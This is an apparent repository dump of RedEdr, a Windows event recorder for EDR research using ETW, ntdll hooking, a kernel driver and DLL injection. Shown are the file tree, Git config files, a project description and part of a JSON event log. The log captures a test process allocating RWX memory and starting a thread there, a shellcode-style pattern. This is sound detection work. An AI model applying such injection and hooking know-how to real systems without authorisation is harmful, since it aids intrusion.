Full Code of dobin/RedEdr for AI

master 95061ac1a6f2 cached

146 files

2.3 MB

615.1k tokens

1246 symbols

1 requests

Download .txt

Showing preview only (2,461K chars total). Download the full file or copy to clipboard to get everything.

Repository: dobin/RedEdr
Branch: master
Commit: 95061ac1a6f2
Files: 146
Total size: 2.3 MB

Directory structure:
gitextract_ihdwzsgx/

├── .gitattributes
├── .gitignore
├── CLAUDE.md
├── Data/
│   ├── dostuff.events.json
│   └── generator.txt
├── Doc/
│   ├── api.md
│   └── notes.md
├── LICENSE.txt
├── README.md
├── RedEdr/
│   ├── RedEdr.cpp
│   ├── RedEdr.vcxproj
│   ├── RedEdr.vcxproj.filters
│   ├── config.cpp
│   ├── config.h
│   ├── cxxops.hpp
│   ├── design.css
│   ├── dllinjector.cpp
│   ├── dllinjector.h
│   ├── dllreader.cpp
│   ├── dllreader.h
│   ├── etwreader.cpp
│   ├── etwreader.h
│   ├── event_aggregator.cpp
│   ├── event_aggregator.h
│   ├── event_augmenter.cpp
│   ├── event_augmenter.h
│   ├── event_processor.cpp
│   ├── event_processor.h
│   ├── httplib.h
│   ├── index.html
│   ├── jsonw.hpp
│   ├── kernelinterface.cpp
│   ├── kernelinterface.h
│   ├── kernelreader.cpp
│   ├── kernelreader.h
│   ├── logging.cpp
│   ├── logging.h
│   ├── logreader.cpp
│   ├── logreader.h
│   ├── manager.cpp
│   ├── manager.h
│   ├── packages.config
│   ├── pplmanager.cpp
│   ├── pplmanager.h
│   ├── pplreader.cpp
│   ├── pplreader.h
│   ├── privileges.cpp
│   ├── privileges.h
│   ├── serviceutils.cpp
│   ├── serviceutils.h
│   ├── shared.js
│   ├── webserver.cpp
│   └── webserver.h
├── RedEdr.sln
├── RedEdrDll/
│   ├── RedEdrDll.filters
│   ├── RedEdrDll.vcxproj
│   ├── RedEdrDll.vcxproj.filters
│   ├── detours.h
│   ├── detours.lib
│   ├── dllhelper.cpp
│   ├── dllhelper.h
│   ├── dllmain.cpp
│   ├── framework.h
│   ├── logging.cpp
│   └── logging.h
├── RedEdrDriver/
│   ├── Driver.c
│   ├── MyDumbEDRDriver.inf
│   ├── RedEdrDriver.inf
│   ├── RedEdrDriver.vcxproj
│   ├── RedEdrDriver.vcxproj.filters
│   ├── hashcache.c
│   ├── hashcache.h
│   ├── kapcinjector.c
│   ├── kapcinjector.h
│   ├── kcallbacks.c
│   ├── kcallbacks.h
│   ├── settings.c
│   ├── settings.h
│   ├── upipe.c
│   ├── upipe.h
│   ├── utils.c
│   └── utils.h
├── RedEdrPplService/
│   ├── README.md
│   ├── RedEdrPplService.cpp
│   ├── RedEdrPplService.vcxproj
│   ├── RedEdrPplService.vcxproj.filters
│   ├── control.cpp
│   ├── control.h
│   ├── emitter.cpp
│   ├── emitter.h
│   ├── etwtihandler.cpp
│   ├── etwtihandler.h
│   ├── etwtireader.cpp
│   ├── etwtireader.h
│   ├── logging.cpp
│   ├── logging.h
│   ├── packages.config
│   └── uthash.h
├── RedEdrShared/
│   ├── RedEdrShared.vcxproj
│   ├── RedEdrShared.vcxproj.filters
│   ├── etw_krabs.cpp
│   ├── etw_krabs.h
│   ├── json.hpp
│   ├── loguru.cpp
│   ├── loguru.hpp
│   ├── mypeb.h
│   ├── myprocess.cpp
│   ├── myprocess.h
│   ├── packages.config
│   ├── piping.cpp
│   ├── piping.h
│   ├── process_mem_static.cpp
│   ├── process_mem_static.h
│   ├── process_query.cpp
│   ├── process_query.h
│   ├── process_resolver.cpp
│   ├── process_resolver.h
│   ├── ranges.cpp
│   ├── ranges.h
│   ├── utils.cpp
│   └── utils.h
├── RedEdrTester/
│   ├── RedEdrTester.cpp
│   ├── RedEdrTester.vcxproj
│   ├── RedEdrTester.vcxproj.filters
│   └── packages.config
├── Shared/
│   └── common.h
├── UnitTests/
│   ├── UnitTestAnalyzer.cpp
│   ├── UnitTestEventProducer.cpp
│   ├── UnitTestProcessInfo.cpp
│   ├── UnitTestRanges.cpp
│   ├── UnitTests.cpp
│   ├── UnitTests.vcxproj
│   ├── UnitTests.vcxproj.filters
│   ├── logging.cpp
│   ├── logging.h
│   └── notepad.json
├── azure_config.json.sample
├── azure_upload.ps1
├── elam_driver/
│   ├── elam_driver.c
│   ├── elam_driver.rc
│   ├── elam_driver.vcxproj
│   └── elam_driver.vcxproj.Filters
├── generate_cert.ps1
├── rededr_ppl.pfx
├── rededr_test.ps1
└── sign_file.ps1

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitattributes
================================================
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto

###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs     diff=csharp

###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following 
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln       merge=binary
#*.csproj    merge=binary
#*.vbproj    merge=binary
#*.vcxproj   merge=binary
#*.vcproj    merge=binary
#*.dbproj    merge=binary
#*.fsproj    merge=binary
#*.lsproj    merge=binary
#*.wixproj   merge=binary
#*.modelproj merge=binary
#*.sqlproj   merge=binary
#*.wwaproj   merge=binary

###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg   binary
#*.png   binary
#*.gif   binary

###############################################################################
# diff behavior for common document formats
# 
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the 
# entries below.
###############################################################################
#*.doc   diff=astextplain
#*.DOC   diff=astextplain
#*.docx  diff=astextplain
#*.DOCX  diff=astextplain
#*.dot   diff=astextplain
#*.DOT   diff=astextplain
#*.pdf   diff=astextplain
#*.PDF   diff=astextplain
#*.rtf   diff=astextplain
#*.RTF   diff=astextplain


================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore

todo.txt
azure_config.json

# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Mono auto generated files
mono_crash.*

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Ww][Ii][Nn]32/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Oo]ut/
[Ll]og/
[Ll]ogs/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/

# ASP.NET Scaffolding
ScaffoldingReadMe.txt

# StyleCop
StyleCopReport.xml

# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# Visual Studio Trace Files
*.e2e

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json

# Coverlet is a free, cross platform Code Coverage Tool
coverage*.json
coverage*.xml
coverage*.info

# Visual Studio code coverage results
*.coverage
*.coveragexml

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
#*.pfx
*.publishsettings
orleans.codegen.cs

# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak

# SQL Server files
*.mdf
*.ldf
*.ndf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# CodeRush personal settings
.cr/personal

# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc

# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config

# Tabs Studio
*.tss

# Telerik's JustMock configuration file
*.jmconfig

# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs

# OpenCover UI analysis results
OpenCover/

# Azure Stream Analytics local run output
ASALocalRun/

# MSBuild Binary and Structured Log
*.binlog

# NVidia Nsight GPU debugger configuration file
*.nvuser

# MFractors (Xamarin productivity tool) working folder
.mfractor/

# Local History for Visual Studio
.localhistory/

# BeatPulse healthcheck temp database
healthchecksdb

# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/

# Ionide (cross platform F# VS Code tools) working folder
.ionide/

# Fody - auto-generated XML schema
FodyWeavers.xsd

================================================
FILE: CLAUDE.md
================================================
# RedEdr

RedEdr will record the events generated by a process. Either its ETW (-TI) events, 
or use ntdll hooking to record the syscalls. It will gather more information about 
the process as needed. 

## Project Structure 

RedEdr is intended to be run as a long running process or service, which observes
processes based on their names. 

It consists of different components: 
* RedEdr: Records ETW, provides command line interface and web UI, and manages and orchastrates the other components
* RedEdrDll: The DLL which will be injected in processes for hooking. Used by RedEdrDriver
* RedEdrPplService: Records ETW-TI data as PPL
* RedEdrDriver: Records kernel events, and performs DLL injection
* RedEdrTester: Debug project to test some parts of RedEdr
* elam_driver: An empty driver signed with a certificate. Required to load RedEdrPplService
* Shared: C defines usable by all components
* RedEdrShared: Some code shared by some components

The communication between components is implemented using Windows pipes. 




================================================
FILE: Data/dostuff.events.json
================================================
[{"callback":"process_create","id":0,"krn_pid":8500,"name":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","observe":1,"parent_name":"\\Device\\HarddiskVolume2\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","pid":1208,"ppid":8500,"time":133791868973812041,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":1,"krn_pid":8500,"pid":1208,"threadid":6916,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":2,"image":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":3,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":4,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":5,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":6,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":7,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":8,"krn_pid":1208,"pid":1208,"threadid":11092,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":9,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":10,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":11,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":12,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":13,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"dlls":[{"addr":140700730916864,"name":"RedEdrTester.exe","size":1630208},{"addr":140722540838912,"name":"ntdll.dll","size":2064384},{"addr":140722507939840,"name":"KERNEL32.DLL","size":794624},{"addr":140722497912832,"name":"KERNELBASE.dll","size":3137536},{"addr":140722518163456,"name":"ADVAPI32.dll","size":724992},{"addr":140722520195072,"name":"msvcrt.dll","size":647168},{"addr":140722529697792,"name":"sechost.dll","size":651264},{"addr":140722510561280,"name":"RPCRT4.dll","size":1191936},{"addr":140722502238208,"name":"bcrypt.dll","size":159744}],"id":14,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"loaded_dll"},{"callback":"image_load","id":15,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"commandline":"\"C:\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe\" dostuff","id":16,"image_base":140700730916864,"image_path":"C:\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","is_debugged":0,"is_protected_process":0,"is_protected_process_light":0,"parent_pid":-3689348818177875660,"time":133791868973842059,"trace_id":41,"type":"peb","working_dir":"C:\\Users\\hacker\\source\\repos\\RedEdr\\"},{"callback":"image_load","id":17,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":18,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":19,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":20,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":21,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":22,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":23,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":24,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":25,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":26,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","krn_pid":1208,"pid":1208,"time":133791868973872050,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":27,"image":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","krn_pid":1208,"pid":1208,"time":133791868973882045,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":28,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","krn_pid":1208,"pid":1208,"time":133791868973892035,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":29,"krn_pid":1208,"pid":1208,"threadid":3196,"time":133791868973902041,"trace_id":41,"type":"kernel"},{"func":"hooking_start","id":30,"pid":1208,"tid":6916,"trace_id":41,"type":"dll"},{"func":"hooking_finished","id":31,"pid":1208,"tid":6916,"trace_id":41,"type":"dll"},{"addr":2470295011328,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":32,"pid":1208,"protect":"RW-","return":0,"size":8192,"size_req":8192,"tid":6916,"time":133791868973902041,"trace_id":41,"type":"dll","zero":0},{"addr":2470295019520,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":33,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":4096,"tid":6916,"time":133791868973902041,"trace_id":41,"type":"dll","zero":0},{"addr":2470294257664,"alloc_type":12288,"func":"NtAllocateVirtualMemory","handle":-1,"id":34,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":3,"tid":6916,"time":133791868979062050,"trace_id":41,"type":"dll","zero":0},{"callback":"image_load","id":35,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","krn_pid":1208,"pid":1208,"time":133791868979062050,"trace_id":41,"type":"kernel"},{"addr":2470294257664,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970362881,"addr_info":"Unknown","idx":1,"page_addr":140721970360320,"protect":"R-X","size":110592,"state":1662004296,"type":"IMAGE"},{"addr":140722498356982,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498355200,"protect":"R-X","size":843776,"state":1662004296,"type":"IMAGE"},{"addr":140700732029427,"addr_info":"RedEdrTester.exe:.text","idx":3,"page_addr":140700732026880,"protect":"R-X","size":159744,"state":1662004296,"type":"IMAGE"},{"addr":140700732031462,"addr_info":"RedEdrTester.exe:.text","idx":4,"page_addr":140700732030976,"protect":"R-X","size":155648,"state":1662004296,"type":"IMAGE"},{"addr":140700732110521,"addr_info":"RedEdrTester.exe:.text","idx":5,"page_addr":140700732108800,"protect":"R-X","size":77824,"state":1662004296,"type":"IMAGE"}],"func":"NtProtectVirtualMemory","handle":-1,"id":36,"pid":1208,"protect":"RWX","return":0,"size":4096,"tid":6916,"time":133791868979062050,"trace_id":41,"type":"dll"},{"callback":"thread_create","create":1,"id":37,"krn_pid":1208,"pid":1208,"threadid":5680,"time":133791868979492052,"trace_id":41,"type":"kernel"},{"argument":2470294257664,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970351516,"addr_info":"Unknown","idx":1,"page_addr":140721970348032,"protect":"R-X","size":122880,"state":1662004296,"type":"IMAGE"},{"addr":140722498157487,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498154496,"protect":"R-X","size":1044480,"state":1662004296,"type":"IMAGE"},{"addr":140722508052765,"addr_info":"KERNEL32.DLL:.text","idx":3,"page_addr":140722508050432,"protect":"R-X","size":421888,"state":1662004296,"type":"IMAGE"},{"addr":140700732029491,"addr_info":"RedEdrTester.exe:.text","idx":4,"page_addr":140700732026880,"protect":"R-X","size":159744,"state":1662004296,"type":"IMAGE"},{"addr":140700732031462,"addr_info":"RedEdrTester.exe:.text","idx":5,"page_addr":140700732030976,"protect":"R-X","size":155648,"state":1662004296,"type":"IMAGE"}],"func":"NtCreateThreadEx","handle":-1,"id":38,"pid":1208,"start_routine":2470294257664,"thread_handle":376,"tid":6916,"time":133791868979492052,"trace_id":41,"type":"dll"},{"desired_access":2031619,"event_type":0,"func":"NtCreateEvent","id":39,"initial_state":0,"pid":1208,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"desired_access":2031619,"event_type":0,"func":"NtCreateEvent","id":40,"initial_state":0,"pid":1208,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"access_mask":983047,"alloc_attributes":134217728,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970348392,"addr_info":"Unknown","idx":1,"page_addr":140721970348032,"protect":"R-X","size":122880,"state":1662004296,"type":"IMAGE"},{"addr":140722498144289,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498142208,"protect":"R-X","size":1056768,"state":1662004296,"type":"IMAGE"},{"addr":140722498145856,"addr_info":"KERNELBASE.dll:.text","idx":3,"page_addr":140722498142208,"protect":"R-X","size":1056768,"state":1662004296,"type":"IMAGE"},{"addr":140722508405615,"addr_info":"KERNEL32.DLL:.text","idx":4,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"},{"addr":140722508405142,"addr_info":"KERNEL32.DLL:.text","idx":5,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"}],"file_handle":0,"func":"NtCreateSection","id":41,"max_size":686538352688,"page_protection":4,"pid":1208,"section_handle":408,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"alloc_type":0,"base_address":0,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970358498,"addr_info":"Unknown","idx":1,"page_addr":140721970356224,"protect":"R-X","size":114688,"state":1662004296,"type":"IMAGE"},{"addr":140722498355462,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498355200,"protect":"R-X","size":843776,"state":1662004296,"type":"IMAGE"},{"addr":140722498355166,"addr_info":"KERNELBASE.dll:.text","idx":3,"page_addr":140722498351104,"protect":"R-X","size":847872,"state":1662004296,"type":"IMAGE"},{"addr":140722508405678,"addr_info":"KERNEL32.DLL:.text","idx":4,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"},{"addr":140722508405142,"addr_info":"KERNEL32.DLL:.text","idx":5,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"}],"func":"NtMapViewOfSection","handle":-1,"id":42,"inherit_disposition":1,"pid":1208,"protect":"RW-","section_handle":408,"section_offset":0,"size":0,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll","view_size":0,"zero_bits":0},{"addr":2470294519808,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":43,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":12,"tid":5680,"time":133791868979512065,"trace_id":41,"type":"dll","zero":0},{"DefaultBase":"00007FF771160000","ImageBase":"00007FF771160000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","ImageSize":"000000000018E000","ProcessID":"1208","TimeDateStamp":"1734703906","event":"ImageLoadInfo ","id":44,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801355267,18446735283801354603,18446735283798965368,18446735283798965216,140722541153392],"thread_id":6916,"time":133791868973826131,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC850F0000","ImageBase":"00007FFC850F0000","ImageCheckSum":"2047181","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","ImageSize":"00000000001F8000","ProcessID":"1208","TimeDateStamp":"1754238027","event":"ImageLoadInfo ","id":45,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801355528,18446735283801354603,18446735283798965368,18446735283798965216,140722541153392],"thread_id":6916,"time":133791868973826763,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83190000","ImageBase":"00007FFC83190000","ImageCheckSum":"811940","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","ImageSize":"00000000000C2000","ProcessID":"1208","TimeDateStamp":"2273328705","event":"ImageLoadInfo ","id":46,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722541705166,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973830298,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82800000","ImageBase":"00007FFC82800000","ImageCheckSum":"3204207","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","ImageSize":"00000000002FE000","ProcessID":"1208","TimeDateStamp":"3522100337","event":"ImageLoadInfo ","id":47,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722541705166,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973831893,"trace_id":41,"type":"etw"},{"addr":2470294519808,"free_type":8000,"func":"NtFreeVirtualMemory","handle":-1,"id":48,"pid":1208,"return":0,"size":4096,"size_req":12,"tid":5680,"time":133791868979782053,"trace_id":41,"type":"dll"},{"DefaultBase":"00007FFC83B50000","ImageBase":"00007FFC83B50000","ImageCheckSum":"766771","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","ImageSize":"00000000000B1000","ProcessID":"1208","TimeDateStamp":"187986496","event":"ImageLoadInfo 